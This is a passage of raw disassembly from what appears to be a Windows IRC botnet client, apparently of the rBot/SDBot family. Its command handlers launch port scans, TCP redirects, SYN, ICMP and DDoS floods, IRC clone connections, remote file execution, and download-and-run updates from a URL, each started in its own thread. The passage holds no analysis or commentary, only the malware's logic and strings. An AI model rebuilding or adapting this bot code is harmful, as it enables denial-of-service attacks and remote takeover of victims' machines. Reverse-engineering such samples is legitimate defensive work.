lea eax, [ebp+var_2EC]
push eax
mov [ebp+arg_0], edi
push [ebp+arg_4]
call dword_44B664 ; getsockname
mov al, [ebp+var_9C7]
push edi
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+var_2E8], eax
push [ebp+var_2E8]
call dword_44B74C ; inet_ntoa
push eax
lea eax, [ebp+var_444]
push eax
call sub_4191A0
add esp, 0Ch
cmp [ebp+var_9B6], bl
jz short loc_40F731
xor eax, eax
cmp [ebp+var_9C7], bl
push 30h
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+var_444]
push eax
call sub_419170
pop ecx
cmp edi, ebx
pop ecx
mov byte ptr [ebp+arg_24+3], bl
jle short loc_40F725
loc_40F703: ; CODE XREF: sub_40C50A+3219�j
cmp eax, ebx
jz short loc_40F725
mov byte ptr [eax], 78h
lea eax, [ebp+var_444]
push 30h
push eax
call sub_419170
inc byte ptr [ebp+arg_24+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_24+3]
cmp ecx, edi
jl short loc_40F703
loc_40F725: ; CODE XREF: sub_40C50A+31F7�j
; sub_40C50A+31FB�j
mov [ebp+var_304], 1
jmp short loc_40F737
; ---------------------------------------------------------------------------
loc_40F731: ; CODE XREF: sub_40C50A+31D1�j
mov [ebp+var_304], ebx
loc_40F737: ; CODE XREF: sub_40C50A+3154�j
; sub_40C50A+3225�j
mov eax, [ebp+arg_4]
push [ebp+var_8C]
mov [ebp+var_334], eax
mov eax, [ebp+var_4]
mov [ebp+var_30C], eax
mov eax, [ebp+var_8]
mov [ebp+var_308], eax
mov edi, 80h
lea eax, [ebp+var_434]
push edi
push eax
call sub_418EF0
mov esi, [ebp+esi+var_7C]
add esp, 0Ch
cmp esi, ebx
jz short loc_40F788
loc_40F775: ; CODE XREF: sub_40C50A+32A1�j
push esi
loc_40F776: ; CODE XREF: sub_40C50A+328B�j
lea eax, [ebp+var_3B4]
push edi
push eax
call sub_418EF0
add esp, 0Ch
jmp short loc_40F7B3
; ---------------------------------------------------------------------------
loc_40F788: ; CODE XREF: sub_40C50A+3269�j
mov eax, [ebp+arg_18]
cmp eax, ebx
jz short loc_40F797
cmp byte ptr [eax], 23h
jnz short loc_40F797
push eax
jmp short loc_40F776
; ---------------------------------------------------------------------------
loc_40F797: ; CODE XREF: sub_40C50A+3283�j
; sub_40C50A+3288�j
mov esi, offset aFf_1 ; "#ff-"
push offset dword_491D8C
push esi
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40F775
mov [ebp+var_3B4], bl
loc_40F7B3: ; CODE XREF: sub_40C50A+327C�j
cmp [ebp+var_304], ebx
mov eax, offset aRandom_0 ; "Random"
jnz short loc_40F7C5
mov eax, offset aSequential ; "Sequential"
loc_40F7C5: ; CODE XREF: sub_40C50A+32B4�j
push [ebp+var_318]
lea ecx, [ebp+var_444]
push [ebp+var_328]
push [ebp+var_32C]
push [ebp+var_330]
push ecx
push eax
lea eax, [ebp+var_2DC]
push offset aScanSPortScanS ; "[SCAN]: %s Port Scan started on %s:%d w"...
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push 8
push eax
call sub_4161EB
add esp, 2Ch
mov [ebp+var_324], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_444]
push ebx
push eax
push offset sub_40328A
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_324]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_40F853
loc_40F83D: ; CODE XREF: sub_40C50A+3347�j
cmp [ebp+var_300], ebx
jnz loc_40EF94
push 32h
call ds:dword_4942D8
jmp short loc_40F83D
; ---------------------------------------------------------------------------
loc_40F853: ; CODE XREF: sub_40C50A+3331�j
call ds:dword_4942F0
push eax
push offset aScanFailedTo_2 ; "[SCAN]: Failed to start scan thread, er"...
jmp loc_40EF85
; ---------------------------------------------------------------------------
loc_40F864: ; CODE XREF: sub_40C50A+2786�j
; sub_40C50A+279D�j
push edi
call sub_4195F0
imul eax, 234h
pop ecx
cmp byte_44D070[eax], bl
jz loc_41263B
cmp [ebp+var_C], ebx
jz loc_41263B
push [ebp+arg_18]
call sub_418E70
push edi
mov esi, eax
call sub_418E70
push [ebp+arg_8]
add esi, eax
call sub_418E70
add eax, [ebp+var_C]
push [ebp+arg_0]
lea eax, [eax+esi+2]
push eax
call sub_419AB0
mov esi, eax
lea eax, [ebp+var_2DC]
push esi
push offset dword_441368
push eax
call sub_418D70
add esp, 20h
cmp esi, ebx
jz loc_41263B
push edi
call sub_4195F0
test eax, eax
pop ecx
jle loc_41263B
push edi
call sub_4195F0
cmp eax, 1F4h
pop ecx
jge loc_41263B
push ebx
lea eax, [ebp+var_2DC]
push ebx
push eax
push [ebp+arg_18]
push edi
call sub_4195F0
imul eax, 234h
pop ecx
push dword_44D064[eax]
call sub_40842D
push edi
call sub_4195F0
imul eax, 234h
add esp, 18h
cmp byte ptr dword_44CE58[eax], 73h
jnz loc_41263B
push esi
push edi
call sub_4195F0
imul eax, 234h
pop ecx
add eax, offset byte_44D070
push eax
push [ebp+arg_18]
push offset aSSS_1 ; "[%s] * %s %s"
loc_40F94C: ; CODE XREF: sub_40C50A+353F�j
lea eax, [ebp+var_2DC]
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40842D
loc_40F971: ; CODE XREF: sub_40C50A+5855�j
add esp, 28h
jmp loc_41263B
; ---------------------------------------------------------------------------
loc_40F979: ; CODE XREF: sub_40C50A+2758�j
; sub_40C50A+276F�j
push edi
call sub_4195F0
imul eax, 234h
pop ecx
cmp byte_44D070[eax], bl
jz loc_41263B
cmp [ebp+var_C], ebx
jz loc_41263B
push [ebp+arg_18]
call sub_418E70
push edi
mov esi, eax
call sub_418E70
push [ebp+arg_8]
add esi, eax
call sub_418E70
add eax, [ebp+var_C]
push [ebp+arg_0]
lea eax, [eax+esi+2]
push eax
call sub_419AB0
mov esi, eax
add esp, 14h
cmp esi, ebx
jz loc_41263B
push edi
call sub_4195F0
test eax, eax
pop ecx
jle loc_41263B
push edi
call sub_4195F0
cmp eax, 1F4h
pop ecx
jge loc_41263B
push ebx
push ebx
push esi
push [ebp+arg_18]
push edi
call sub_4195F0
imul eax, 234h
pop ecx
push dword_44D064[eax]
call sub_40842D
push edi
call sub_4195F0
imul eax, 234h
add esp, 18h
cmp byte ptr dword_44CE58[eax], 73h
jnz loc_41263B
push esi
push edi
call sub_4195F0
imul eax, 234h
pop ecx
add eax, offset byte_44D070
push eax
push [ebp+arg_18]
push offset aSSS_2 ; "[%s] <%s> %s"
jmp loc_40F94C
; ---------------------------------------------------------------------------
loc_40FA4E: ; CODE XREF: sub_40C50A+272A�j
; sub_40C50A+2741�j
push edi
call dword_44B700 ; inet_addr
push [ebp+arg_18]
mov [ebp+var_474], eax
call sub_4195F0
push [ebp+arg_0]
mov [ebp+var_480], eax
call sub_4195F0
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_8C]
mov [ebp+var_47C], eax
lea eax, [ebp+var_500]
mov [ebp+var_504], esi
push eax
call sub_4191A0
add esp, 14h
mov edi, [ebp+var_4]
mov eax, [ebp+var_8]
mov [ebp+var_46C], edi
push [ebp+var_47C]
mov [ebp+var_468], eax
push [ebp+var_480]
push [ebp+var_474]
call dword_44B74C ; inet_ntoa
push eax
lea eax, [ebp+var_2DC]
push offset aScanPortScanSt ; "[SCAN]: Port scan started: %s:%d with d"...
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push 8
push eax
call sub_4161EB
add esp, 20h
mov [ebp+var_478], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_504]
push ebx
push eax
push offset sub_4139E0
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_478]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_40FB30
loc_40FB1A: ; CODE XREF: sub_40C50A+3624�j
cmp [ebp+var_464], ebx
jnz loc_411B78
push 32h
call ds:dword_4942D8
jmp short loc_40FB1A
; ---------------------------------------------------------------------------
loc_40FB30: ; CODE XREF: sub_40C50A+360E�j
call ds:dword_4942F0
push eax
push offset aScanFailedTo_3 ; "[SCAN]: Failed to start scan thread, er"...
jmp loc_411B69
; ---------------------------------------------------------------------------
loc_40FB41: ; CODE XREF: sub_40C50A+26FC�j
; sub_40C50A+2713�j
push edi
call sub_4195F0
push 7Fh
mov [ebp+var_314], eax
push [ebp+arg_18]
lea eax, [ebp+var_418]
push eax
call sub_4191A0
push [ebp+arg_0]
call sub_4195F0
push [ebp+var_8C]
mov esi, [ebp+arg_4]
mov [ebp+var_318], eax
lea eax, [ebp+var_398]
push 80h
push eax
mov [ebp+var_420], esi
call sub_418EF0
mov eax, [ebp+var_8]
add esp, 20h
mov edi, [ebp+var_4]
mov [ebp+var_304], eax
push [ebp+var_318]
lea eax, [ebp+var_418]
mov [ebp+var_308], edi
push eax
push [ebp+var_314]
push esi
call sub_40AFEC
pop ecx
push eax
lea eax, [ebp+var_2DC]
push offset aRedirectTcpRed ; "[REDIRECT]: TCP redirect created from: "...
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push 10h
push eax
call sub_4161EB
add esp, 24h
mov [ebp+var_310], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_420]
push ebx
push eax
push offset sub_412814
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_310]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_40FC2A
loc_40FC14: ; CODE XREF: sub_40C50A+371E�j
cmp [ebp+var_300], ebx
jnz loc_411B78
push 32h
call ds:dword_4942D8
jmp short loc_40FC14
; ---------------------------------------------------------------------------
loc_40FC2A: ; CODE XREF: sub_40C50A+3708�j
call ds:dword_4942F0
push eax
push offset aRedirectFailed ; "[REDIRECT]: Failed to start redirection"...
jmp loc_411B69
; ---------------------------------------------------------------------------
loc_40FC3B: ; CODE XREF: sub_40C50A+26CE�j
; sub_40C50A+26E5�j
push 0FFh
lea eax, [ebp+var_780]
push edi
push eax
call sub_4191A0
push 0FFh
lea eax, [ebp+var_680]
push [ebp+arg_18]
push eax
call sub_4191A0
push [ebp+arg_0]
mov [ebp+var_57C], ebx
call sub_4195F0
mov [ebp+var_578], eax
mov eax, [ebp+esi+var_84]
add esp, 1Ch
cmp eax, ebx
jz short loc_40FC97
push 10h
push ebx
push eax
call sub_41ABB0
add esp, 0Ch
mov [ebp+var_570], eax
jmp short loc_40FC9D
; ---------------------------------------------------------------------------
loc_40FC97: ; CODE XREF: sub_40C50A+3777�j
mov [ebp+var_570], ebx
loc_40FC9D: ; CODE XREF: sub_40C50A+378B�j
mov esi, [ebp+esi+var_80]
cmp esi, ebx
jz short loc_40FCB4
push esi
call sub_4195F0
pop ecx
mov [ebp+var_574], eax
jmp short loc_40FCBA
; ---------------------------------------------------------------------------
loc_40FCB4: ; CODE XREF: sub_40C50A+3799�j
mov [ebp+var_574], ebx
loc_40FCBA: ; CODE XREF: sub_40C50A+37A8�j
movzx eax, [ebp+var_9C3]
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_8C]
mov [ebp+var_56C], eax
lea eax, [ebp+var_800]
mov [ebp+var_804], esi
push eax
call sub_4191A0
mov eax, [ebp+var_4]
push [ebp+arg_18]
mov [ebp+var_564], eax
mov eax, [ebp+var_8]
mov [ebp+var_568], eax
push edi
lea eax, [ebp+var_2DC]
push offset aDownloadDown_1 ; "[DOWNLOAD]: Downloading URL: %s to: %s."...
push eax
call sub_418D70
push esi
lea eax, [ebp+var_2DC]
push 15h
push eax
call sub_4161EB
add esp, 28h
mov [ebp+var_580], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_804]
push ebx
push eax
push offset sub_405084
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_580]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_40FD68
loc_40FD52: ; CODE XREF: sub_40C50A+385C�j
cmp [ebp+var_560], ebx
jnz loc_40F3D3
push 32h
call ds:dword_4942D8
jmp short loc_40FD52
; ---------------------------------------------------------------------------
loc_40FD68: ; CODE XREF: sub_40C50A+3846�j
call ds:dword_4942F0
push eax
push offset aDownloadFailed ; "[DOWNLOAD]: Failed to start transfer th"...
jmp loc_40FF6B
; ---------------------------------------------------------------------------
loc_40FD79: ; CODE XREF: sub_40C50A+26A0�j
; sub_40C50A+26B7�j
push 7Fh
lea eax, [ebp+var_76C]
pop esi
push esi
push edi
push eax
call sub_4191A0
push esi
lea eax, [ebp+var_6EC]
push [ebp+arg_18]
push eax
call sub_4191A0
push esi
lea eax, [ebp+var_66C]
push [ebp+arg_0]
push eax
call sub_4191A0
push esi
lea eax, [ebp+var_5EC]
push [ebp+var_8C]
push eax
call sub_4191A0
mov eax, [ebp+var_8]
push [ebp+arg_0]
mov esi, [ebp+var_4]
mov [ebp+var_564], eax
mov eax, [ebp+arg_4]
push [ebp+arg_18]
mov [ebp+var_770], eax
lea eax, [ebp+var_2DC]
push edi
push offset aSynFloodingSSF ; "[SYN]: Flooding: (%s:%s) for %s seconds"...
push eax
mov [ebp+var_568], esi
call sub_418D70
add esp, 44h
lea eax, [ebp+var_2DC]
push ebx
push 0Bh
push eax
call sub_4161EB
add esp, 0Ch
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_770]
push ebx
push eax
push offset sub_414ECB
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_40FE4C
loc_40FE3A: ; CODE XREF: sub_40C50A+3940�j
cmp [ebp+var_560], ebx
jnz short loc_40FE67
push 32h
call ds:dword_4942D8
jmp short loc_40FE3A
; ---------------------------------------------------------------------------
loc_40FE4C: ; CODE XREF: sub_40C50A+392E�j
call ds:dword_4942F0
push eax
lea eax, [ebp+var_2DC]
push offset aSynFailedToSta ; "[SYN]: Failed to start flood thread, er"...
push eax
call sub_418D70
add esp, 0Ch
loc_40FE67: ; CODE XREF: sub_40C50A+3936�j
cmp [ebp+var_8], ebx
jnz loc_40EFB5
push ebx
push esi
jmp loc_40EF9D
; ---------------------------------------------------------------------------
loc_40FE77: ; CODE XREF: sub_40C50A+265B�j
; sub_40C50A+2672�j ...
push 7Fh
lea eax, [ebp+var_7E8]
pop esi
push esi
push edi
push eax
call sub_4191A0
push esi
lea eax, [ebp+var_768]
push [ebp+arg_18]
push eax
call sub_4191A0
push esi
lea eax, [ebp+var_6E8]
push [ebp+arg_0]
push eax
call sub_4191A0
push esi
lea eax, [ebp+var_668]
push [ebp+var_8C]
push eax
call sub_4191A0
push 20h
lea eax, [ebp+var_5E8]
push [ebp+arg_8]
push eax
call sub_4191A0
mov eax, [ebp+var_4]
push [ebp+arg_0]
mov esi, [ebp+arg_4]
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
push [ebp+arg_18]
mov [ebp+var_564], eax
lea eax, [ebp+var_2DC]
push edi
push offset aDdosFloodingSS ; "[DDoS]: Flooding: (%s:%s) for %s second"...
push eax
mov [ebp+var_7F0], esi
call sub_418D70
add esp, 50h
lea eax, [ebp+var_2DC]
push ebx
push 0Ah
push eax
call sub_4161EB
add esp, 0Ch
mov [ebp+var_7EC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_7F0]
push ebx
push eax
push offset sub_404C3D
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_7EC]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_40FF5F
loc_40FF49: ; CODE XREF: sub_40C50A+3A53�j
cmp [ebp+var_560], ebx
jnz loc_40F3D3
push 32h
call ds:dword_4942D8
jmp short loc_40FF49
; ---------------------------------------------------------------------------
loc_40FF5F: ; CODE XREF: sub_40C50A+3A3D�j
call ds:dword_4942F0
push eax
push offset aDdosFailedToSt ; "[DDoS]: Failed to start flood thread, e"...
loc_40FF6B: ; CODE XREF: sub_40C50A+2EAB�j
; sub_40C50A+2FF6�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_418D70
jmp loc_40F3D0
; ---------------------------------------------------------------------------
loc_40FF7C: ; CODE XREF: sub_40C50A+262D�j
; sub_40C50A+2644�j
push 7Fh
lea eax, [ebp+var_458]
push edi
push eax
call sub_4191A0
push [ebp+arg_18]
call sub_4195F0
push 3Fh
mov [ebp+var_308], eax
push [ebp+arg_0]
lea eax, [ebp+var_3D8]
push eax
call sub_4191A0
mov esi, [ebp+esi+var_84]
add esp, 1Ch
cmp esi, ebx
jz short loc_40FFCA
push 3Fh
lea eax, [ebp+var_398]
push esi
push eax
call sub_4191A0
add esp, 0Ch
loc_40FFCA: ; CODE XREF: sub_40C50A+3AAC�j
lea eax, [ebp+var_3D8]
mov [ebp+var_304], 1
push eax
lea eax, [ebp+var_458]
push [ebp+var_308]
push eax
lea eax, [ebp+var_2DC]
push offset aClonesCreatedO ; "[CLONES]: Created on %s:%d, in channel "...
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push 17h
push eax
call sub_4161EB
add esp, 20h
mov [ebp+var_300], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_45C]
push ebx
push eax
push offset sub_40C22A
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_300]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_410056
loc_410040: ; CODE XREF: sub_40C50A+3B4A�j
cmp [ebp+var_2FC], ebx
jnz loc_41110A
push 32h
call ds:dword_4942D8
jmp short loc_410040
; ---------------------------------------------------------------------------
loc_410056: ; CODE XREF: sub_40C50A+3B34�j
call ds:dword_4942F0
push eax
push offset aClonesFailedTo ; "[CLONES]: Failed to start clone thread,"...
jmp loc_40EF0C
; ---------------------------------------------------------------------------
loc_410067: ; CODE XREF: sub_40C50A+25ED�j
; sub_40C50A+2604�j
push [ebp+arg_18]
call sub_4195F0
cmp eax, ebx
pop ecx
mov [ebp+var_570], eax
jle loc_410158
mov esi, 80h
push edi
lea eax, [ebp+var_6F8]
push esi
push eax
call sub_418EF0
xor eax, eax
cmp [ebp+var_9B6], bl
push [ebp+var_8C]
setnz al
mov [ebp+var_56C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_6FC], eax
lea eax, [ebp+var_5F8]
push esi
push eax
call sub_418EF0
mov eax, [ebp+var_4]
push [ebp+arg_18]
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
push edi
push offset aIcmpFloodingSF ; "[ICMP]: Flooding: (%s) for %s seconds."
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_418EF0
push ebx
lea eax, [ebp+var_2DC]
push 0Dh
push eax
call sub_4161EB
add esp, 38h
mov [ebp+var_578], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_6FC]
push ebx
push eax
push offset sub_407E55
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_578]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_410147
loc_410131: ; CODE XREF: sub_40C50A+3C3B�j
cmp [ebp+var_560], ebx
jnz loc_40EF94
push 32h
call ds:dword_4942D8
jmp short loc_410131
; ---------------------------------------------------------------------------
loc_410147: ; CODE XREF: sub_40C50A+3C25�j
call ds:dword_4942F0
push eax
push offset aIcmpFailedToSt ; "[ICMP]: Failed to start flood thread, e"...
jmp loc_40EF85
; ---------------------------------------------------------------------------
loc_410158: ; CODE XREF: sub_40C50A+3B6E�j
push offset aIcmpInvalidFlo ; "[ICMP]: Invalid flood time must be grea"...
jmp loc_411C97
; ---------------------------------------------------------------------------
loc_410162: ; CODE XREF: sub_40C50A+25BF�j
; sub_40C50A+25D6�j
push [ebp+arg_18]
push edi
call ds:dword_4943D8
test eax, eax
jz short loc_410192
push [ebp+arg_18]
lea eax, [ebp+var_2DC]
push edi
push offset aFileRenameSToS ; "[FILE]: Rename: '%s' to: '%s'."
push 200h
push eax
call sub_418EF0
loc_41018A: ; CODE XREF: sub_40C50A+44C3�j
add esp, 14h
jmp loc_40EF94
; ---------------------------------------------------------------------------
loc_410192: ; CODE XREF: sub_40C50A+3C64�j
push offset aFile_1 ; "[FILE]:"
call sub_409AA0
push eax
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_418EF0
add esp, 10h
jmp loc_40EF94
; ---------------------------------------------------------------------------
loc_4101B6: ; CODE XREF: sub_40C50A+2591�j
; sub_40C50A+25A8�j
push edi
lea eax, [ebp+var_774]
push 104h
push eax
call sub_418EF0
add esp, 0Ch
cmp [ebp+var_C], ebx
jz short loc_4101F0
push [ebp+arg_18]
push [ebp+var_C]
call sub_419AB0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_4101F0
push eax
lea eax, [ebp+var_670]
push eax
call sub_418D70
pop ecx
pop ecx
loc_4101F0: ; CODE XREF: sub_40C50A+3CC4�j
; sub_40C50A+3CD5�j
push [ebp+var_8C]
lea eax, [ebp+var_7F4]
push 80h
push eax
call sub_418EF0
mov eax, [ebp+arg_4]
mov [ebp+var_7F8], eax
mov eax, [ebp+var_4]
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_670]
push eax
lea eax, [ebp+var_774]
push eax
push offset aFindfileSear_0 ; "[FINDFILE]: Searching for file: %s in: "...
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_418EF0
push ebx
lea eax, [ebp+var_2DC]
push 1Bh
push eax
call sub_4161EB
add esp, 2Ch
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_7F8]
push ebx
push eax
push offset sub_405A20
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_4102A3
loc_41028D: ; CODE XREF: sub_40C50A+3D97�j
cmp [ebp+var_560], ebx
jnz loc_40EFB5
push 32h
call ds:dword_4942D8
jmp short loc_41028D
; ---------------------------------------------------------------------------
loc_4102A3: ; CODE XREF: sub_40C50A+3D81�j
call ds:dword_4942F0
push eax
push offset aFindfileFailed ; "[FINDFILE]: Failed to start search thre"...
jmp loc_4124D0
; ---------------------------------------------------------------------------
loc_4102B4: ; CODE XREF: sub_40C50A+2563�j
; sub_40C50A+257A�j
push 44h
lea eax, [ebp+var_4A0]
pop esi
push esi
push ebx
push eax
call sub_4189A0
push 1
mov [ebp+var_4A0], esi
pop esi
mov word ptr [ebp+var_470], bx
push edi
mov [ebp+var_474], esi
call sub_4195F0
add esp, 10h
cmp eax, esi
jnz short loc_4102F1
mov word ptr [ebp+var_470], 5
loc_4102F1: ; CODE XREF: sub_40C50A+3DDC�j
cmp [ebp+var_C], ebx
jz loc_41110A
push [ebp+arg_18]
push [ebp+var_C]
call sub_419AB0
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz loc_41110A
lea eax, [ebp+var_2EC]
push eax
lea eax, [ebp+var_4A0]
push eax
push ebx
push ebx
push 28h
push esi
push ebx
push ebx
push edi
push ebx
call ds:dword_494330
test eax, eax
jnz short loc_41033C
push offset aExecCouldnTExe ; "[EXEC]: Couldn't execute file."
jmp loc_4110FC
; ---------------------------------------------------------------------------
loc_41033C: ; CODE XREF: sub_40C50A+3E26�j
push edi
push offset aExecCommandsS ; "[EXEC]: Commands: %s"
jmp loc_40EF0C
; ---------------------------------------------------------------------------
loc_410347: ; CODE XREF: sub_40C50A+2535�j
; sub_40C50A+254C�j
push [ebp+arg_18]
push offset aFenr ; "FEnR"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4104BB
lea eax, [ebp+var_3FC]
push eax
push 104h
call ds:dword_4943AC
push 0FFh
lea eax, [ebp+var_780]
push edi
push eax
call sub_4191A0
lea eax, [ebp+var_2F8]
push eax
call sub_413590
push eax
lea eax, [ebp+var_3FC]
push eax
lea eax, [ebp+var_680]
push offset aSS_exe ; "%s%s.exe"
push eax
call sub_418D70
mov eax, [ebp+esi+var_88]
add esp, 20h
cmp eax, ebx
mov [ebp+var_57C], 1
mov [ebp+var_578], ebx
jz short loc_4103D9
push 10h
push ebx
push eax
call sub_41ABB0
add esp, 0Ch
mov [ebp+var_570], eax
jmp short loc_4103DF
; ---------------------------------------------------------------------------
loc_4103D9: ; CODE XREF: sub_40C50A+3EB9�j
mov [ebp+var_570], ebx
loc_4103DF: ; CODE XREF: sub_40C50A+3ECD�j
mov esi, [ebp+esi+var_84]
cmp esi, ebx
jz short loc_4103F9
push esi
call sub_4195F0
pop ecx
mov [ebp+var_574], eax
jmp short loc_4103FF
; ---------------------------------------------------------------------------
loc_4103F9: ; CODE XREF: sub_40C50A+3EDE�j
mov [ebp+var_574], ebx
loc_4103FF: ; CODE XREF: sub_40C50A+3EED�j
movzx eax, [ebp+var_9C3]
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_8C]
mov [ebp+var_56C], eax
lea eax, [ebp+var_800]
mov [ebp+var_804], esi
push eax
call sub_4191A0
mov eax, [ebp+var_4]
push edi
mov [ebp+var_564], eax
mov eax, [ebp+var_8]
mov [ebp+var_568], eax
lea eax, [ebp+var_2DC]
push offset aUpdateDownload ; "[UPDATE]: Downloading update from: %s."
push eax
call sub_418D70
push esi
lea eax, [ebp+var_2DC]
push 16h
push eax
call sub_4161EB
add esp, 24h
mov [ebp+var_580], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_804]
push ebx
push eax
push offset sub_405084
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_580]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_4104AA
loc_410494: ; CODE XREF: sub_40C50A+3F9E�j
cmp [ebp+var_560], ebx
jnz loc_41110A
push 32h
call ds:dword_4942D8
jmp short loc_410494
; ---------------------------------------------------------------------------
loc_4104AA: ; CODE XREF: sub_40C50A+3F88�j
call ds:dword_4942F0
push eax
push offset aUpdateFailedTo ; "[UPDATE]: Failed to start download thre"...
jmp loc_40EF0C
; ---------------------------------------------------------------------------
loc_4104BB: ; CODE XREF: sub_40C50A+3E4E�j
push offset aUpdateBotIdMus ; "[UPDATE]: Bot ID must be different than"...
jmp loc_4110FC
; ---------------------------------------------------------------------------
loc_4104C5: ; CODE XREF: sub_40C50A+2507�j
; sub_40C50A+251E�j
push [ebp+var_90]
push offset a332_0 ; "332"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40C97C
cmp [ebp+var_C], ebx
jz loc_40C97C
push [ebp+arg_18]
push [ebp+var_C]
call sub_419AB0
push eax
lea eax, [ebp+var_2DC]
push [ebp+var_8C]
push [ebp+var_90]
push [ebp+var_94]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_418D70
lea eax, [ebp+var_2DC]
push 1FFh
push eax
push [ebp+arg_0]
call sub_4191A0
push edi
call sub_4195F0
add esp, 30h
test eax, eax
jle short loc_41054C
push edi
call sub_4195F0
imul eax, 3E8h
pop ecx
push eax
call ds:dword_4942D8
loc_41054C: ; CODE XREF: sub_40C50A+402C�j
push offset aMainDelay_ ; "[MAIN]: Delay."
call sub_4035E1
mov eax, [ebp+arg_24]
pop ecx
inc eax
jmp loc_40C97F
; ---------------------------------------------------------------------------
loc_410560: ; CODE XREF: sub_40C50A+24D9�j
; sub_40C50A+24F0�j
push [ebp+var_90]
push offset a332_1 ; "332"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40C97C
cmp [ebp+var_C], ebx
jz loc_41263B
push [ebp+arg_18]
push [ebp+var_C]
call sub_419AB0
mov esi, eax
mov eax, [ebp+arg_18]
inc eax
push offset aRepeat_0 ; "repeat"
push eax
call sub_419360
add esp, 10h
test eax, eax
push esi
jz short loc_41061C
push [ebp+var_8C]
lea eax, [ebp+var_2DC]
push [ebp+var_90]
push [ebp+var_94]
push offset aSSSS_0 ; "%s %s %s :%s"
push eax
call sub_418D70
lea eax, [ebp+var_2DC]
push 1FFh
push eax
push [ebp+arg_0]
call sub_4191A0
push esi
lea eax, [ebp+var_2DC]
push offset aMainRepeatS ; "[MAIN]: Repeat: %s"
push eax
call sub_418D70
lea eax, [ebp+var_2DC]
push eax
call sub_4035E1
push edi
call sub_4195F0
add esp, 38h
test eax, eax
jle loc_41263B
push edi
call sub_4195F0
add eax, [ebp+arg_24]
pop ecx
jmp loc_40C97F
; ---------------------------------------------------------------------------
loc_41061C: ; CODE XREF: sub_40C50A+409B�j
push offset aMainRepeatNotA ; "[MAIN]: Repeat not allowed in command l"...
jmp loc_40EF0C
; ---------------------------------------------------------------------------
loc_410626: ; CODE XREF: sub_40C50A+24AB�j
; sub_40C50A+24C2�j
push [ebp+arg_18]
lea eax, [ebp+var_2DC]
push offset aPartS ; "PART %s"
push eax
call sub_418D70
push edi
call sub_4195F0
add esp, 10h
test eax, eax
jle loc_41263B
push edi
call sub_4195F0
cmp eax, 1F4h
pop ecx
jge loc_41263B
lea eax, [ebp+var_2DC]
push eax
push offset aS_24 ; "%s\r\n"
loc_410669: ; CODE XREF: sub_40C50A+41C9�j
; sub_40C50A+4CE0�j
push edi
call sub_4195F0
imul eax, 234h
pop ecx
push dword_44D064[eax]
call sub_4083E7
loc_410681: ; CODE XREF: sub_40C50A+5D62�j
add esp, 0Ch
jmp loc_41263B
; ---------------------------------------------------------------------------
loc_410689: ; CODE XREF: sub_40C50A+247D�j
; sub_40C50A+2494�j
push [ebp+esi+var_88]
lea eax, [ebp+var_2DC]
push [ebp+arg_18]
